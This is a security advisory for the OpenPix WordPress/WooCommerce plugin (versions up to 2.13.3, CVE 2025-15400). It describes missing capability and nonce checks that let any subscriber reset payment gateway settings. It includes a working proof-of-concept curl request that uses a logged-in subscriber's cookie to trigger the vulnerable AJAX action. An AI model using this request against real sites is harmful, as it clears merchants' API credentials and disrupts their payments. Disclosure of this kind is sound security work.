OpenPix <= 2.13.3 – Subscriber+ Payment Gateway Settings Reset | CVE 2025-15400

Description

The plugin allows any authenticated user to trigger AJAX actions that reset payment gateway configuration options without capability or nonce checks. This permits any authenticated users, such as subscribers to clear API credentials and webhook status, causing persistent disruption of OpenPix payment functionality.

Proof of Concept

1. Go to WooCommerce >> Settings >> Payments and add AppID and other details for the OpenPix Pix payment. 
4. From another browser, login to a normal customer/subscriber account and get the cookies from dev tool. 
5. Run the following cURL command :

```
curl -i -X POST "http://example.com/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Cookie: wordpress_logged_in_xxxx=xxxx" \
  --data "action=openpix_prepare_oneclick"

6. Now to go to WooCommerce >> Settings >> Payments >> OpenPix Pix and check that all the details like AppID have been reset.